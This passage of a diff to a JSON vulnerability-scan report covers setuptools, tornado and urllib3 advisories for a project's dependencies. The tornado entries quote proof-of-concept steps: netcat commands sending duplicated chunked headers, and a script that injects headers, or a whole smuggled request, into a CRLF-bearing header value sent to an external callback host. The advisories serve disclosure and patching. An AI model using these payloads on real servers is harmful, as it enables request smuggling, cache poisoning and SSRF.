"23.1.0", - "23.2.0", - "23.2.1", - "24.0.0", - "24.0.1", - "24.0.2", - "24.0.3", - "24.1.0", - "24.1.1", - "24.2.0", - "24.2.1", - "24.3.0", - "24.3.1", - "25.0.0", - "25.0.1", - "25.0.2", - "25.1.0", - "25.1.1", - "25.1.2", - "25.1.3", - "25.1.4", - "25.1.5", - "25.1.6", - "25.2.0", - "25.3.0", - "25.4.0", - "26.0.0", - "26.1.0", - "26.1.1", - "27.0.0", - "27.1.0", - "27.1.2", - "27.2.0", - "27.3.0", - "27.3.1", - "28.0.0", - "28.1.0", - "28.2.0", - "28.3.0", - "28.4.0", - "28.5.0", - "28.6.0", - "28.6.1", - "28.7.0", - "28.7.1", - "28.8.0", - "28.8.1", - "29.0.0", - "29.0.1", - "3.0", - "3.0.1", - "3.0.2", - "3.1", - "3.2", - "3.3", - "3.4", - "3.4.1", - "3.4.2", - "3.4.3", - "3.4.4", - "3.5", - "3.5.1", - "3.5.2", - "3.6", - "3.7", - "3.7.1", - "3.8", - "3.8.1", - "30.0.0", - "30.1.0", - "30.2.0", - "30.2.1", - "30.3.0", - "30.4.0", - "31.0.0", - "31.0.1", - "32.0.0", - "32.1.0", - "32.1.1", - "32.1.2", - "32.1.3", - "32.2.0", - "32.3.0", - "32.3.1", - "33.1.0", - "33.1.1", - "34.0.0", - "34.0.1", - "34.0.2", - "34.0.3", - "34.1.0", - "34.1.1", - "34.2.0", - "34.3.0", - "34.3.1", - "34.3.2", - "34.3.3", - "34.4.0", - "34.4.1", - "35.0.0", - "35.0.1", - "35.0.2", - "36.0.1", - "36.1.0", - "36.1.1", - "36.2.0", - "36.2.1", - "36.2.2", - "36.2.3", - "36.2.4", - "36.2.5", - "36.2.6", - "36.2.7", - "36.3.0", - "36.4.0", - "36.5.0", - "36.6.0", - "36.6.1", - "36.7.0", - "36.7.1", - "36.7.2", - "36.8.0", - "37.0.0", - "38.0.0", - "38.1.0", - "38.2.0", - "38.2.1", - "38.2.3", - "38.2.4", - "38.2.5", - "38.3.0", - "38.4.0", - "38.4.1", - "38.5.0", - "38.5.1", - "38.5.2", - "38.6.0", - "38.6.1", - "38.7.0", - "39.0.0", - "39.0.1", - "39.1.0", - "39.2.0", - "4.0", - "4.0.1", - "40.0.0", - "40.1.0", - "40.1.1", - "40.2.0", - "40.3.0", - "40.4.0", - "40.4.1", - "40.4.2", - "40.4.3", - "40.5.0", - "40.6.0", - "40.6.1", - "40.6.2", - "40.6.3", - "40.7.0", - "40.7.1", - "40.7.2", - "40.7.3", - "40.8.0", - "40.9.0", - "41.0.0", - "41.0.1", - "41.1.0", - "41.2.0", - "41.3.0", - 
"41.4.0", - "41.5.0", - "41.5.1", - "41.6.0", - "42.0.0", - "42.0.1", - "42.0.2", - "43.0.0", - "44.0.0", - "44.1.0", - "44.1.1", - "45.0.0", - "45.1.0", - "45.2.0", - "45.3.0", - "46.0.0", - "46.1.0", - "46.1.1", - "46.1.2", - "46.1.3", - "46.2.0", - "46.3.0", - "46.3.1", - "46.4.0", - "47.0.0", - "47.1.0", - "47.1.1", - "47.2.0", - "47.3.0", - "47.3.1", - "47.3.2", - "48.0.0", - "49.0.0", - "49.0.1", - "49.1.0", - "49.1.1", - "49.1.2", - "49.1.3", - "49.2.0", - "49.2.1", - "49.3.0", - "49.3.1", - "49.3.2", - "49.4.0", - "49.5.0", - "49.6.0", - "5.0", - "5.0.1", - "5.0.2", - "5.1", - "5.2", - "5.3", - "5.4", - "5.4.1", - "5.4.2", - "5.5", - "5.5.1", - "5.6", - "5.7", - "5.8", - "50.0.0", - "50.0.1", - "50.0.2", - "50.0.3", - "50.1.0", - "50.2.0", - "50.3.0", - "50.3.1", - "50.3.2", - "51.0.0", - "51.1.0", - "51.1.0.post20201221", - "51.1.1", - "51.1.2", - "51.2.0", - "51.3.0", - "51.3.1", - "51.3.2", - "51.3.3", - "52.0.0", - "53.0.0", - "53.1.0", - "54.0.0", - "54.1.0", - "54.1.1", - "54.1.2", - "54.1.3", - "54.2.0", - "56.0.0", - "56.1.0", - "56.2.0", - "57.0.0", - "57.1.0", - "57.2.0", - "57.3.0", - "57.4.0", - "57.5.0", - "58.0.0", - "58.0.1", - "58.0.2", - "58.0.3", - "58.0.4", - "58.1.0", - "58.2.0", - "58.3.0", - "58.4.0", - "58.5.0", - "58.5.1", - "58.5.2", - "58.5.3", - "59.0.1", - "59.1.0", - "59.1.1", - "59.2.0", - "59.3.0", - "59.4.0", - "59.5.0", - "59.6.0", - "59.7.0", - "59.8.0", - "6.0.1", - "6.0.2", - "6.1", - "60.0.0", - "60.0.1", - "60.0.2", - "60.0.3", - "60.0.4", - "60.0.5", - "60.1.0", - "60.1.1", - "60.10.0", - "60.2.0", - "60.3.0", - "60.3.1", - "60.4.0", - "60.5.0", - "60.6.0", - "60.7.0", - "60.7.1", - "60.8.0", - "60.8.1", - "60.8.2", - "60.9.0", - "60.9.1", - "60.9.2", - "60.9.3", - "61.0.0", - "61.1.0", - "61.1.1", - "61.2.0", - "61.3.0", - "61.3.1", - "62.0.0", - "62.1.0", - "62.2.0", - "62.3.0", - "62.3.1", - "62.3.2", - "62.3.3", - "62.3.4", - "62.4.0", - "62.5.0", - "62.6.0", - "63.0.0", - "63.0.0b1", - "63.1.0", - "63.2.0", - 
"63.3.0", - "63.4.0", - "63.4.1", - "63.4.2", - "63.4.3", - "64.0.0", - "64.0.1", - "64.0.2", - "64.0.3", - "65.0.0", - "65.0.1", - "65.0.2", - "65.1.0", - "65.1.1", - "65.2.0", - "65.3.0", - "65.4.0", - "65.4.1", - "65.5.0", - "65.5.1", - "65.6.0", - "65.6.1", - "65.6.2", - "65.6.3", - "65.7.0", - "66.0.0", - "66.1.0", - "66.1.1", - "67.0.0", - "67.1.0", - "67.2.0", - "67.3.1", - "67.3.2", - "67.3.3", - "67.4.0", - "67.5.0", - "67.5.1", - "67.6.0", - "67.6.1", - "67.7.0", - "67.7.1", - "67.7.2", - "67.8.0", - "68.0.0", - "68.1.0", - "68.1.2", - "68.2.0", - "68.2.1", - "68.2.2", - "69.0.0", - "69.0.1", - "69.0.2", - "69.0.3", - "69.1.0", - "69.1.1", - "69.2.0", - "69.3.0", - "69.3.1", - "69.4.0", - "69.4.1", - "69.4.2", - "69.5.0", - "69.5.1", - "7.0", - "8.0", - "8.0.1", - "8.0.2", - "8.0.3", - "8.0.4", - "8.1", - "8.2", - "8.2.1", - "8.3", - "9.0", - "9.0.1", - "9.1" - ], - "database_specific": { - "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/07/GHSA-cx63-2mw6-8hw5/GHSA-cx63-2mw6-8hw5.json" - } - } - ], - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" - }, - { - "type": "CVSS_V4", - "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" - } - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-6345" - }, - { - "type": "WEB", - "url": "https://github.com/pypa/setuptools/pull/4332" - }, - { - "type": "WEB", - "url": "https://github.com/pypa/setuptools/commit/88807c7062788254f654ea8c03427adc859321f0" - }, - { - "type": "PACKAGE", - "url": "https://github.com/pypa/setuptools" - }, - { - "type": "WEB", - "url": "https://huntr.com/bounties/d6362117-ad57-4e83-951f-b8141c6e7ca5" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-94" - ], - "github_reviewed": true, - "github_reviewed_at": "2024-07-15T16:25:38Z", - "nvd_published_at": "2024-07-15T01:15:01Z", - "severity": "HIGH" - } - } - ], - 
"groups": [ - { - "ids": [ - "GHSA-cx63-2mw6-8hw5" - ], - "aliases": [ - "BIT-setuptools-2024-6345", - "CVE-2024-6345", - "GHSA-cx63-2mw6-8hw5" - ], - "max_severity": "8.8" - } - ] - }, - { - "package": { - "name": "tornado", - "version": "6.4", - "ecosystem": "PyPI" - }, - "dependency_groups": [ - "sickchill-requirements" - ], - "vulnerabilities": [ - { - "modified": "2024-06-06T21:46:24Z", - "published": "2024-06-06T21:41:20Z", - "schema_version": "1.6.0", - "id": "GHSA-753j-mpmx-qq6g", - "related": [ - "CGA-2mj6-w546-q9r6", - "CGA-72gj-8qx6-gcj4", - "CGA-gfgp-4jrg-x8xh", - "CGA-wq3q-35vc-xj9h" - ], - "summary": "Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling') in tornado", - "details": "### Summary\nWhen Tornado receives a request with two `Transfer-Encoding: chunked` headers, it ignores them both. This enables request smuggling when Tornado is deployed behind a proxy server that emits such requests. [Pound](https://en.wikipedia.org/wiki/Pound_(networking)) does this.\n\n### PoC\n0. Install Tornado.\n1. Start a simple Tornado server that echoes each received request's body:\n```bash\ncat << EOF > server.py\nimport asyncio\nimport tornado\n\nclass MainHandler(tornado.web.RequestHandler):\n def post(self):\n self.write(self.request.body)\n\nasync def main():\n tornado.web.Application([(r\"/\", MainHandler)]).listen(8000)\n await asyncio.Event().wait()\n\nasyncio.run(main())\nEOF\npython3 server.py &\n```\n2. Send a valid chunked request:\n```bash\nprintf 'POST / HTTP/1.1\\r\\nTransfer-Encoding: chunked\\r\\n\\r\\n1\\r\\nZ\\r\\n0\\r\\n\\r\\n' | nc localhost 8000\n```\n3. Observe that the response is as expected:\n```\nHTTP/1.1 200 OK\nServer: TornadoServer/6.3.3\nContent-Type: text/html; charset=UTF-8\nDate: Sat, 07 Oct 2023 17:32:05 GMT\nContent-Length: 1\n\nZ\n```\n4. 
Send a request with two `Transfer-Encoding: chunked` headers:\n```\nprintf 'POST / HTTP/1.1\\r\\nTransfer-Encoding: chunked\\r\\nTransfer-Encoding: chunked\\r\\n\\r\\n1\\r\\nZ\\r\\n0\\r\\n\\r\\n' | nc localhost 8000\n```\n5. Observe the strange response:\n```\nHTTP/1.1 200 OK\nServer: TornadoServer/6.3.3\nContent-Type: text/html; charset=UTF-8\nDate: Sat, 07 Oct 2023 17:35:40 GMT\nContent-Length: 0\n\nHTTP/1.1 400 Bad Request\n\n```\nThis is because Tornado believes that the request has no message body, so it tries to interpret `1\\r\\nZ\\r\\n0\\r\\n\\r\\n` as its own request, which causes a 400 response. With a little cleverness involving `chunk-ext`s, you can get Tornado to instead respond 405, which has the potential to desynchronize the connection, as opposed to 400 which should always result in a connection closure.\n\n### Impact\nAnyone using Tornado behind a proxy that forwards requests containing multiple `Transfer-Encoding: chunked` headers is vulnerable to request smuggling, which may entail ACL bypass, cache poisoning, or connection desynchronization.\n", - "affected": [ - { - "package": { - "ecosystem": "PyPI", - "name": "tornado", - "purl": "pkg:pypi/tornado" - }, - "ranges": [ - { - "type": "ECOSYSTEM", - "events": [ - { - "introduced": "0" - }, - { - "fixed": "6.4.1" - } - ] - } - ], - "versions": [ - "0.2", - "1.0", - "1.1", - "1.1.1", - "1.2", - "1.2.1", - "2.0", - "2.1", - "2.1.1", - "2.2", - "2.2.1", - "2.3", - "2.4", - "2.4.1", - "3.0", - "3.0.1", - "3.0.2", - "3.1", - "3.1.1", - "3.2", - "3.2.1", - "3.2.2", - "4.0", - "4.0.1", - "4.0.2", - "4.1", - "4.1b2", - "4.2", - "4.2.1", - "4.2b1", - "4.3", - "4.3b1", - "4.3b2", - "4.4", - "4.4.1", - "4.4.2", - "4.4.3", - "4.4b1", - "4.5", - "4.5.1", - "4.5.2", - "4.5.3", - "4.5b1", - "4.5b2", - "5.0", - "5.0.1", - "5.0.2", - "5.0a1", - "5.0b1", - "5.1", - "5.1.1", - "5.1b1", - "6.0", - "6.0.1", - "6.0.2", - "6.0.3", - "6.0.4", - "6.0a1", - "6.0b1", - "6.1", - "6.1b1", - "6.1b2", - "6.2", - "6.2b1", - 
"6.2b2", - "6.3", - "6.3.1", - "6.3.2", - "6.3.3", - "6.3b1", - "6.4", - "6.4b1" - ], - "database_specific": { - "last_known_affected_version_range": "<= 6.4.0", - "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/06/GHSA-753j-mpmx-qq6g/GHSA-753j-mpmx-qq6g.json" - } - } - ], - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" - } - ], - "references": [ - { - "type": "WEB", - "url": "https://github.com/tornadoweb/tornado/security/advisories/GHSA-753j-mpmx-qq6g" - }, - { - "type": "WEB", - "url": "https://github.com/tornadoweb/tornado/commit/d65f6e71a77f53a1ff0a0dc55704be13f04eb572" - }, - { - "type": "PACKAGE", - "url": "https://github.com/tornadoweb/tornado" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-444" - ], - "github_reviewed": true, - "github_reviewed_at": "2024-06-06T21:41:20Z", - "nvd_published_at": null, - "severity": "MODERATE" - } - }, - { - "modified": "2024-06-06T22:04:10Z", - "published": "2024-06-06T21:46:31Z", - "schema_version": "1.6.0", - "id": "GHSA-w235-7p84-xx57", - "related": [ - "CGA-3mg6-hjmp-vwjr", - "CGA-cj87-mmpg-46c2", - "CGA-fgf6-jq66-8gmr", - "CGA-jf2f-4wch-4c93" - ], - "summary": "Tornado has a CRLF injection in CurlAsyncHTTPClient headers", - "details": "### Summary\nTornado\u2019s `curl_httpclient.CurlAsyncHTTPClient` class is vulnerable to CRLF (carriage return/line feed) injection in the request headers.\n\n### Details\nWhen an HTTP request is sent using `CurlAsyncHTTPClient`, Tornado does not reject carriage return (\\r) or line feed (\\n) characters in the request headers. 
As a result, if an application includes an attacker-controlled header value in a request sent using `CurlAsyncHTTPClient`, the attacker can inject arbitrary headers into the request or cause the application to send arbitrary requests to the specified server.\n\nThis behavior differs from that of the standard `AsyncHTTPClient` class, which does reject CRLF characters.\n\nThis issue appears to stem from libcurl's (as well as pycurl's) lack of validation for the [`HTTPHEADER`](https://curl.se/libcurl/c/CURLOPT_HTTPHEADER.html) option. libcurl\u2019s documentation states:\n\n> The headers included in the linked list must not be CRLF-terminated, because libcurl adds CRLF after each header item itself. Failure to comply with this might result in strange behavior. libcurl passes on the verbatim strings you give it, without any filter or other safe guards. That includes white space and control characters.\n\npycurl similarly appears to assume that the headers adhere to the correct format. Therefore, without any validation on Tornado\u2019s part, header names and values are included verbatim in the request sent by `CurlAsyncHTTPClient`, including any control characters that have special meaning in HTTP semantics.\n\n### PoC\nThe issue can be reproduced using the following script:\n\n```python\nimport asyncio\n\nfrom tornado import httpclient\nfrom tornado import curl_httpclient\n\nasync def main():\n http_client = curl_httpclient.CurlAsyncHTTPClient()\n\n request = httpclient.HTTPRequest(\n # Burp Collaborator payload\n \"http://727ymeu841qydmnwlol261ktkkqbe24qt.oastify.com/\",\n method=\"POST\",\n body=\"body\",\n # Injected header using CRLF characters\n headers={\"Foo\": \"Bar\\r\\nHeader: Injected\"}\n )\n\n response = await http_client.fetch(request)\n print(response.body)\n\n http_client.close()\n\nif __name__ == \"__main__\":\n asyncio.run(main())\n```\n\nWhen the specified server receives the request, it contains the injected header (`Header: Injected`) on its own 
line:\n\n```http\nPOST / HTTP/1.1\nHost: 727ymeu841qydmnwlol261ktkkqbe24qt.oastify.com\nUser-Agent: Mozilla/5.0 (compatible; pycurl)\nAccept: */*\nAccept-Encoding: gzip,deflate\nFoo: Bar\nHeader: Injected\nContent-Length: 4\nContent-Type: application/x-www-form-urlencoded\n\nbody\n```\n\nThe attacker can also construct entirely new requests using a payload with multiple CRLF sequences. For example, specifying a header value of `\\r\\n\\r\\nPOST /attacker-controlled-url HTTP/1.1\\r\\nHost: 727ymeu841qydmnwlol261ktkkqbe24qt.oastify.com` results in the server receiving an additional, attacker-controlled request:\n\n```http\nPOST /attacker-controlled-url HTTP/1.1\nHost: 727ymeu841qydmnwlol261ktkkqbe24qt.oastify.com\nContent-Length: 4\nContent-Type: application/x-www-form-urlencoded\n\nbody\n```\n\n### Impact\nApplications using the Tornado library to send HTTP requests with untrusted header data are affected. This issue may facilitate the exploitation of server-side request forgery (SSRF) vulnerabilities.", - "affected": [ - { - "package": { - "ecosystem": "PyPI", - "name": "tornado", - "purl": "pkg:pypi/tornado" - }, - "ranges": [ - { - "type": "ECOSYSTEM", - "events": [ - { - "introduced": "0" - }, - { - "fixed": "6.4.1" - } - ] - } - ], - "versions": [ - "0.2", - "1.0", - "1.1", - "1.1.1", - "1.2", - "1.2.1", - "2.0", - "2.1", - "2.1.1", - "2.2", - "2.2.1", - "2.3", - "2.4", - "2.4.1", + "20.0", + "20.1", + "20.1.1", + "20.10.1", + "20.2.2", + "20.3", + "20.3.1", + "20.4", + "20.6.6", + "20.6.7", + "20.6.8", + "20.7.0", + "20.8.0", + "20.8.1", + "20.9.0", + "21.0.0", + "21.1.0", + "21.2.0", + "21.2.1", + "21.2.2", + "22.0.0", + "22.0.1", + "22.0.2", + "22.0.4", + "22.0.5", + "23.0.0", + "23.1.0", + "23.2.0", + "23.2.1", + "24.0.0", + "24.0.1", + "24.0.2", + "24.0.3", + "24.1.0", + "24.1.1", + "24.2.0", + "24.2.1", + "24.3.0", + "24.3.1", + "25.0.0", + "25.0.1", + "25.0.2", + "25.1.0", + "25.1.1", + "25.1.2", + "25.1.3", + "25.1.4", + "25.1.5", + "25.1.6", + 
"25.2.0", + "25.3.0", + "25.4.0", + "26.0.0", + "26.1.0", + "26.1.1", + "27.0.0", + "27.1.0", + "27.1.2", + "27.2.0", + "27.3.0", + "27.3.1", + "28.0.0", + "28.1.0", + "28.2.0", + "28.3.0", + "28.4.0", + "28.5.0", + "28.6.0", + "28.6.1", + "28.7.0", + "28.7.1", + "28.8.0", + "28.8.1", + "29.0.0", + "29.0.1", "3.0", "3.0.1", "3.0.2", "3.1", - "3.1.1", "3.2", - "3.2.1", - "3.2.2", + "3.3", + "3.4", + "3.4.1", + "3.4.2", + "3.4.3", + "3.4.4", + "3.5", + "3.5.1", + "3.5.2", + "3.6", + "3.7", + "3.7.1", + "3.8", + "3.8.1", + "30.0.0", + "30.1.0", + "30.2.0", + "30.2.1", + "30.3.0", + "30.4.0", + "31.0.0", + "31.0.1", + "32.0.0", + "32.1.0", + "32.1.1", + "32.1.2", + "32.1.3", + "32.2.0", + "32.3.0", + "32.3.1", + "33.1.0", + "33.1.1", + "34.0.0", + "34.0.1", + "34.0.2", + "34.0.3", + "34.1.0", + "34.1.1", + "34.2.0", + "34.3.0", + "34.3.1", + "34.3.2", + "34.3.3", + "34.4.0", + "34.4.1", + "35.0.0", + "35.0.1", + "35.0.2", + "36.0.1", + "36.1.0", + "36.1.1", + "36.2.0", + "36.2.1", + "36.2.2", + "36.2.3", + "36.2.4", + "36.2.5", + "36.2.6", + "36.2.7", + "36.3.0", + "36.4.0", + "36.5.0", + "36.6.0", + "36.6.1", + "36.7.0", + "36.7.1", + "36.7.2", + "36.8.0", + "37.0.0", + "38.0.0", + "38.1.0", + "38.2.0", + "38.2.1", + "38.2.3", + "38.2.4", + "38.2.5", + "38.3.0", + "38.4.0", + "38.4.1", + "38.5.0", + "38.5.1", + "38.5.2", + "38.6.0", + "38.6.1", + "38.7.0", + "39.0.0", + "39.0.1", + "39.1.0", + "39.2.0", "4.0", "4.0.1", - "4.0.2", - "4.1", - "4.1b2", - "4.2", - "4.2.1", - "4.2b1", - "4.3", - "4.3b1", - "4.3b2", - "4.4", - "4.4.1", - "4.4.2", - "4.4.3", - "4.4b1", - "4.5", - "4.5.1", - "4.5.2", - "4.5.3", - "4.5b1", - "4.5b2", + "40.0.0", + "40.1.0", + "40.1.1", + "40.2.0", + "40.3.0", + "40.4.0", + "40.4.1", + "40.4.2", + "40.4.3", + "40.5.0", + "40.6.0", + "40.6.1", + "40.6.2", + "40.6.3", + "40.7.0", + "40.7.1", + "40.7.2", + "40.7.3", + "40.8.0", + "40.9.0", + "41.0.0", + "41.0.1", + "41.1.0", + "41.2.0", + "41.3.0", + "41.4.0", + "41.5.0", + "41.5.1", + "41.6.0", + 
"42.0.0", + "42.0.1", + "42.0.2", + "43.0.0", + "44.0.0", + "44.1.0", + "44.1.1", + "45.0.0", + "45.1.0", + "45.2.0", + "45.3.0", + "46.0.0", + "46.1.0", + "46.1.1", + "46.1.2", + "46.1.3", + "46.2.0", + "46.3.0", + "46.3.1", + "46.4.0", + "47.0.0", + "47.1.0", + "47.1.1", + "47.2.0", + "47.3.0", + "47.3.1", + "47.3.2", + "48.0.0", + "49.0.0", + "49.0.1", + "49.1.0", + "49.1.1", + "49.1.2", + "49.1.3", + "49.2.0", + "49.2.1", + "49.3.0", + "49.3.1", + "49.3.2", + "49.4.0", + "49.5.0", + "49.6.0", "5.0", "5.0.1", "5.0.2", - "5.0a1", - "5.0b1", "5.1", - "5.1.1", - "5.1b1", - "6.0", + "5.2", + "5.3", + "5.4", + "5.4.1", + "5.4.2", + "5.5", + "5.5.1", + "5.6", + "5.7", + "5.8", + "50.0.0", + "50.0.1", + "50.0.2", + "50.0.3", + "50.1.0", + "50.2.0", + "50.3.0", + "50.3.1", + "50.3.2", + "51.0.0", + "51.1.0", + "51.1.0.post20201221", + "51.1.1", + "51.1.2", + "51.2.0", + "51.3.0", + "51.3.1", + "51.3.2", + "51.3.3", + "52.0.0", + "53.0.0", + "53.1.0", + "54.0.0", + "54.1.0", + "54.1.1", + "54.1.2", + "54.1.3", + "54.2.0", + "56.0.0", + "56.1.0", + "56.2.0", + "57.0.0", + "57.1.0", + "57.2.0", + "57.3.0", + "57.4.0", + "57.5.0", + "58.0.0", + "58.0.1", + "58.0.2", + "58.0.3", + "58.0.4", + "58.1.0", + "58.2.0", + "58.3.0", + "58.4.0", + "58.5.0", + "58.5.1", + "58.5.2", + "58.5.3", + "59.0.1", + "59.1.0", + "59.1.1", + "59.2.0", + "59.3.0", + "59.4.0", + "59.5.0", + "59.6.0", + "59.7.0", + "59.8.0", "6.0.1", "6.0.2", - "6.0.3", - "6.0.4", - "6.0a1", - "6.0b1", "6.1", - "6.1b1", - "6.1b2", - "6.2", - "6.2b1", - "6.2b2", - "6.3", - "6.3.1", - "6.3.2", - "6.3.3", - "6.3b1", - "6.4", - "6.4b1" + "60.0.0", + "60.0.1", + "60.0.2", + "60.0.3", + "60.0.4", + "60.0.5", + "60.1.0", + "60.1.1", + "60.10.0", + "60.2.0", + "60.3.0", + "60.3.1", + "60.4.0", + "60.5.0", + "60.6.0", + "60.7.0", + "60.7.1", + "60.8.0", + "60.8.1", + "60.8.2", + "60.9.0", + "60.9.1", + "60.9.2", + "60.9.3", + "61.0.0", + "61.1.0", + "61.1.1", + "61.2.0", + "61.3.0", + "61.3.1", + "62.0.0", + "62.1.0", + 
"62.2.0", + "62.3.0", + "62.3.1", + "62.3.2", + "62.3.3", + "62.3.4", + "62.4.0", + "62.5.0", + "62.6.0", + "63.0.0", + "63.0.0b1", + "63.1.0", + "63.2.0", + "63.3.0", + "63.4.0", + "63.4.1", + "63.4.2", + "63.4.3", + "64.0.0", + "64.0.1", + "64.0.2", + "64.0.3", + "65.0.0", + "65.0.1", + "65.0.2", + "65.1.0", + "65.1.1", + "65.2.0", + "65.3.0", + "65.4.0", + "65.4.1", + "65.5.0", + "65.5.1", + "65.6.0", + "65.6.1", + "65.6.2", + "65.6.3", + "65.7.0", + "66.0.0", + "66.1.0", + "66.1.1", + "67.0.0", + "67.1.0", + "67.2.0", + "67.3.1", + "67.3.2", + "67.3.3", + "67.4.0", + "67.5.0", + "67.5.1", + "67.6.0", + "67.6.1", + "67.7.0", + "67.7.1", + "67.7.2", + "67.8.0", + "68.0.0", + "68.1.0", + "68.1.2", + "68.2.0", + "68.2.1", + "68.2.2", + "69.0.0", + "69.0.1", + "69.0.2", + "69.0.3", + "69.1.0", + "69.1.1", + "69.2.0", + "69.3.0", + "69.3.1", + "69.4.0", + "69.4.1", + "69.4.2", + "69.5.0", + "69.5.1", + "7.0", + "8.0", + "8.0.1", + "8.0.2", + "8.0.3", + "8.0.4", + "8.1", + "8.2", + "8.2.1", + "8.3", + "9.0", + "9.0.1", + "9.1" ], "database_specific": { - "last_known_affected_version_range": "<= 6.4.0", - "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/06/GHSA-w235-7p84-xx57/GHSA-w235-7p84-xx57.json" + "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/07/GHSA-cx63-2mw6-8hw5/GHSA-cx63-2mw6-8hw5.json" } } ], "severity": [ { "type": "CVSS_V3", - "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N" - } - ], - "references": [ - { - "type": "WEB", - "url": "https://github.com/tornadoweb/tornado/security/advisories/GHSA-w235-7p84-xx57" - }, - { - "type": "WEB", - "url": "https://github.com/tornadoweb/tornado/commit/7786f09f84c9f3f2012c4cf3878417cb9f053669" - }, - { - "type": "PACKAGE", - "url": "https://github.com/tornadoweb/tornado" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-93" - ], - "github_reviewed": true, - "github_reviewed_at": "2024-06-06T21:46:31Z", - 
"nvd_published_at": null, - "severity": "MODERATE" - } - } - ], - "groups": [ - { - "ids": [ - "GHSA-753j-mpmx-qq6g" - ], - "aliases": [ - "GHSA-753j-mpmx-qq6g" - ], - "max_severity": "5.3" - }, - { - "ids": [ - "GHSA-w235-7p84-xx57" - ], - "aliases": [ - "GHSA-w235-7p84-xx57" - ], - "max_severity": "6.5" - } - ] - }, - { - "package": { - "name": "urllib3", - "version": "2.2.1", - "ecosystem": "PyPI" - }, - "dependency_groups": [ - "sickchill-requirements" - ], - "vulnerabilities": [ - { - "modified": "2024-07-15T22:12:28Z", - "published": "2024-06-17T21:37:20Z", - "schema_version": "1.6.0", - "id": "GHSA-34jh-p97f-mpxf", - "aliases": [ - "CVE-2024-37891" - ], - "related": [ - "CGA-2vvm-h2g8-jrwc", - "CGA-32mf-hm7c-cqmg", - "CGA-37xg-qrch-w8h8", - "CGA-3ggr-w55x-hf5j", - "CGA-5v3j-934q-gj4m", - "CGA-64rf-gm8h-pg8g", - "CGA-688x-4mm6-g5vm", - "CGA-69g4-mv22-46cq", - "CGA-8f64-fgpv-jxj2", - "CGA-8hq8-2689-rc8h", - "CGA-cx62-9vw2-mmpq", - "CGA-grjq-jh3q-2p7g", - "CGA-gwpm-7fhq-3wh2", - "CGA-h28r-8q2c-xq96", - "CGA-j235-35vq-wrm8", - "CGA-jqq5-p5w5-hr5j", - "CGA-m9q6-p3c8-wp58", - "CGA-mrr8-97mj-749q", - "CGA-rqhm-766h-p289", - "CGA-vgvj-86h2-mvw3", - "CGA-vwcx-7fqm-jggq", - "CGA-w3h9-h7jv-6q22" - ], - "summary": "urllib3's Proxy-Authorization request header isn't stripped during cross-origin redirects ", - "details": "When using urllib3's proxy support with `ProxyManager`, the `Proxy-Authorization` header is only sent to the configured proxy, as expected.\n\nHowever, when sending HTTP requests *without* using urllib3's proxy support, it's possible to accidentally configure the `Proxy-Authorization` header even though it won't have any effect as the request is not using a forwarding proxy or a tunneling proxy. 
In those cases, urllib3 doesn't treat the `Proxy-Authorization` HTTP header as one carrying authentication material and thus doesn't strip the header on cross-origin redirects.\n\nBecause this is a highly unlikely scenario, we believe the severity of this vulnerability is low for almost all users. Out of an abundance of caution urllib3 will automatically strip the `Proxy-Authorization` header during cross-origin redirects to avoid the small chance that users are doing this on accident.\n\nUsers should use urllib3's proxy support or disable automatic redirects to achieve safe processing of the `Proxy-Authorization` header, but we still decided to strip the header by default in order to further protect users who aren't using the correct approach.\n\n## Affected usages\n\nWe believe the number of usages affected by this advisory is low. It requires all of the following to be true to be exploited:\n\n* Setting the `Proxy-Authorization` header without using urllib3's built-in proxy support.\n* Not disabling HTTP redirects.\n* Either not using an HTTPS origin server or for the proxy or target origin to redirect to a malicious origin.\n\n## Remediation\n\n* Using the `Proxy-Authorization` header with urllib3's `ProxyManager`.\n* Disabling HTTP redirects using `redirects=False` when sending requests.\n* Not using the `Proxy-Authorization` header.", - "affected": [ - { - "package": { - "ecosystem": "PyPI", - "name": "urllib3", - "purl": "pkg:pypi/urllib3" - }, - "ranges": [ - { - "type": "ECOSYSTEM", - "events": [ - { - "introduced": "0" - }, - { - "fixed": "1.26.19" - } - ] - } - ], - "versions": [ - "0.2", - "0.3", - "0.3.1", - "0.4.0", - "0.4.1", - "1.0", - "1.0.1", - "1.0.2", - "1.1", - "1.10", - "1.10.1", - "1.10.2", - "1.10.3", - "1.10.4", - "1.11", - "1.12", - "1.13", - "1.13.1", - "1.14", - "1.15", - "1.15.1", - "1.16", - "1.17", - "1.18", - "1.18.1", - "1.19", - "1.19.1", - "1.2", - "1.2.1", - "1.2.2", - "1.20", - "1.21", - "1.21.1", - "1.22", - "1.23", - "1.24", - 
